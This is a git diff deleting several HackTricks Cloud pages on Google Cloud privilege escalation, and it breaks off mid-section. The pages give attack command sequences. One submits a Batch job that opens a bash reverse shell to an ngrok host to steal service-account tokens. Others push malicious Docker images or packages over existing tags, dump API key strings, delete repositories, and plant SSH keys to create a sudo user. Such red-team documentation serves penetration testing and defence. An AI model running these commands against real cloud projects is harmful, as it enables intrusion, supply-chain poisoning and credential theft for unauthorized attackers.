-### Post Exploitation
-
-The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section:
-
-{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %}
-[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
deleted file mode 100644
index b8c3adc3a..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
+++ /dev/null
@@ -1,105 +0,0 @@
-# GCP - Apikeys Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Apikeys
-
-The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
-
-Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
-
-For more information about API Keys check:
-
-{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %}
-[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md)
-{% endcontent-ref %}
-
-For other ways to create API keys check:
-
-{% content-ref url="gcp-serviceusage-privesc.md" %}
-[gcp-serviceusage-privesc.md](gcp-serviceusage-privesc.md)
-{% endcontent-ref %}
-
-### Brute Force API Key access
-
-As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.**
-
-### `apikeys.keys.create`
-
-This permission allows to **create an API key**:
-
-```bash
-gcloud services api-keys create
-Operation [operations/akmf.p7-[...]9] complete. Result: {
- "@type":"type.googleapis.com/google.api.apikeys.v2.Key",
- "createTime":"2022-01-26T12:23:06.281029Z",
- "etag":"W/\"HOhA[...]==\"",
- "keyString":"AIzaSy[...]oU",
- "name":"projects/5[...]6/locations/global/keys/f707[...]e8",
- "uid":"f707[...]e8",
- "updateTime":"2022-01-26T12:23:06.378442Z"
-}
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh).
-
-{% hint style="danger" %}
-Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**.
-{% endhint %}
-
-### `apikeys.keys.getKeyString` , `apikeys.keys.list`
-
-These permissions allows **list and get all the apiKeys and get the Key**:
-
-```bash
-for key in $(gcloud services api-keys list --uri); do
- gcloud services api-keys get-key-string "$key"
-done
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
-
-### `apikeys.keys.undelete` , `apikeys.keys.list`
-
-These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done:
-
-```bash
-gcloud services api-keys list --show-deleted
-gcloud services api-keys undelete
-```
-
-### Create Internal OAuth Application to phish other workers
-
-Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin):
-
-{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %}
-[gws-google-platforms-phishing](../../workspace-security/gws-google-platforms-phishing/)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
deleted file mode 100644
index 9d868f485..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
+++ /dev/null
@@ -1,210 +0,0 @@
-# GCP - Artifact Registry Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### artifactregistry.repositories.uploadArtifacts - -With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images: - -{% code overflow="wrap" %} -```bash -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# tag the image to upload it -docker tag : -docker.pkg.dev///: - -# Upload it -docker push -docker.pkg.dev///: -``` -{% endcode %} - -{% hint style="danger" %} -It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded. -{% endhint %} - -
- -Upload a Python library - -**Start by creating the library to upload** (if you can download the latest version from the registry you can avoid this step): - -1. **Set up your project structure**: - - * Create a new directory for your library, e.g., `hello_world_library`. - * Inside this directory, create another directory with your package name, e.g., `hello_world`. - * Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package. - - ```bash - mkdir hello_world_library - cd hello_world_library - mkdir hello_world - touch hello_world/__init__.py - ``` -2. **Write your library code**: - - * Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`. - * Write your "Hello, World!" function: - - ```python - # hello_world/greet.py - def say_hello(): - return "Hello, World!" - ``` -3. **Create a `setup.py` file**: - - * In the root of your `hello_world_library` directory, create a `setup.py` file. - * This file contains metadata about your library and tells Python how to install it. - - ```python - # setup.py - from setuptools import setup, find_packages - - setup( - name='hello_world', - version='0.1', - packages=find_packages(), - install_requires=[ - # Any dependencies your library needs - ], - ) - ``` - -**Now, lets upload the library:** - -1. **Build your package**: - - * From the root of your `hello_world_library` directory, run: - - ```sh - python3 setup.py sdist bdist_wheel - ``` -2. **Configure authentication for twine** (used to upload your package): - * Ensure you have `twine` installed (`pip install twine`). - * Use `gcloud` to configure credentials: - -{% code overflow="wrap" %} -```` -```sh -twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://-python.pkg.dev/// dist/* -``` -```` -{% endcode %} - -3. **Clean the build** - -```bash -rm -rf dist build hello_world.egg-info -``` - -
- -{% hint style="danger" %} -It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:** - -{% code overflow="wrap" %} -```sh -gcloud artifacts versions delete --repository= --location= --package= -``` -{% endcode %} -{% endhint %} - -### `artifactregistry.repositories.downloadArtifacts` - -With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**. - -Download a **Docker** image: - -```sh -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# Dowload image -docker pull -docker.pkg.dev///: -``` - -Download a **python** library: - -{% code overflow="wrap" %} -```bash -pip install --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@-python.pkg.dev///simple/" --trusted-host -python.pkg.dev --no-cache-dir -``` -{% endcode %} - -* What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? 
Check this page: - -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} - -### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`) - -Delete artifacts from the registry, like docker images: - -{% code overflow="wrap" %} -```bash -# Delete a docker image -gcloud artifacts docker images delete -docker.pkg.dev///: -``` -{% endcode %} - -### `artifactregistry.repositories.delete` - -Detele a full repository (even if it has content): - -{% code overflow="wrap" %} -``` -gcloud artifacts repositories delete --location= -``` -{% endcode %} - -### `artifactregistry.repositories.setIamPolicy` - -An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks. - -### Pivoting to other Services through Artifact Registry Read & Write - -* **Cloud Functions** - -When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**. - -* **App Engine** - -Even though App Engine creates docker images inside Artifact Registry. 
It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ -It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
deleted file mode 100644
index 7f41fa8b8..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
+++ /dev/null
@@ -1,84 +0,0 @@
-# GCP - Batch Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Batch - -Basic information: - -{% content-ref url="../gcp-services/gcp-batch-enum.md" %} -[gcp-batch-enum.md](../gcp-services/gcp-batch-enum.md) -{% endcontent-ref %} - -### `batch.jobs.create`, `iam.serviceAccounts.actAs` - -It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default). - -```bash -gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" - } - } - ], - "volumes": [] - } - } - ], - "allocationPolicy": { - "instances": [ - { - "policy": { - "provisioningModel": "STANDARD", - "machineType": "e2-micro" - } - } - ] - }, - "logsPolicy": { - "destination": "CLOUD_LOGGING" - } -} -EOD -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
deleted file mode 100644
index d8c3facd3..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
+++ /dev/null
@@ -1,54 +0,0 @@
-# GCP - ClientAuthConfig Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -### Create OAuth Brand and Client - -[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions: - -* `clientauthconfig.brands.list` -* `clientauthconfig.brands.create` -* `clientauthconfig.brands.get` -* `clientauthconfig.clients.create` -* `clientauthconfig.clients.listWithSecrets` -* `clientauthconfig.clients.getWithSecret` -* `clientauthconfig.clients.delete` -* `clientauthconfig.clients.update` - -{% code overflow="wrap" %} -```bash -# Create a brand -gcloud iap oauth-brands list -gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_email=SUPPORT_EMAIL -# Create a client of the brand -gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
deleted file mode 100644
index 3d7d16fef..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# GCP - Cloudidentity Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Cloudidentity - -For more information about the cloudidentity service, check this page: - -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} - -### Add yourself to a group - -If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: - -{% code overflow="wrap" %} -```bash -gcloud identity groups memberships add --group-email --member-email [--roles OWNER] -# If --roles isn't specified you will get MEMBER -``` -{% endcode %} - -### Modify group membership - -If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: - -{% code overflow="wrap" %} -```bash -# Check the current membership level -gcloud identity groups memberships describe --member-email --group-email - -# If not OWNER try -gcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
deleted file mode 100644
index c762f6c84..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
+++ /dev/null
@@ -1,115 +0,0 @@
-# GCP - Add Custom SSH Metadata
-
-## GCP - Add Custom SSH Metadata
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -### Modifying the metadata - -Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. - -#### **Incorporation of SSH Keys into Custom Metadata** - -On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. - -Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. - -#### **Add SSH key to existing privileged user** - -1. **Examine Existing SSH Keys on the Instance:** - * Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. - - ```bash - gcloud compute instances describe [INSTANCE] --zone [ZONE] - ``` - * Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. -2. **Prepare a Text File for SSH Key Metadata:** - * Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones. -3. 
**Generate a New SSH Key for the Target User (`alice` in this example):** - * Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. - - ```bash - ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub - ``` - * Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. -4. **Update the Instance's SSH Key Metadata:** - * Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. - - ```bash - gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt - ``` -5. **Access the Instance Using the New SSH Key:** - * Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). - - ```bash - ssh -i ./key alice@localhost - sudo id - ``` - -#### **Create a new privileged user and add a SSH key** - -If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -#### SSH keys at project level - -It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: - -1. 
**Apply SSH Keys at the Project Level:** - * Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. - - ```bash - gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt - ``` -2. **SSH into Instances Using Project-Wide Keys:** - * With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. - * A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
deleted file mode 100644
index 0599a6328..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
+++ /dev/null
@@ -1,118 +0,0 @@
-# GCP - Container Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## container - -### `container.clusters.get` - -This permission allows to **gather credentials for the Kubernetes cluster** using something like: - -```bash -gcloud container clusters get-credentials --zone -``` - -Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment. - -{% hint style="info" %} -Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet. -{% endhint %} - -If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this: - -```yaml -apiVersion: v1 -clusters: -- cluster: - certificate-authority-data: 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 - server: https://34.123.141.28 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -contexts: -- context: - cluster: gke_security-devbox_us-central1_autopilot-cluster-1 - user: gke_security-devbox_us-central1_autopilot-cluster-1 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -current-context: gke_security-devbox_us-central1_autopilot-cluster-1 -kind: Config -preferences: {} -users: -- name: gke_security-devbox_us-central1_autopilot-cluster-1 - user: - auth-provider: - config: - access-token: - cmd-args: config config-helper --format=json - cmd-path: gcloud - expiry: "2022-12-06T01:13:11Z" - expiry-key: '{.credential.token_expiry}' - token-key: '{.credential.access_token}' - name: gcp -``` - -### `container.roles.escalate` | `container.clusterRoles.escalate` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. 
However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions. - -### `container.roles.bind` | `container.clusterRoles.bind` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions. - -### `container.cronJobs.create` | `container.cronJobs.update` | 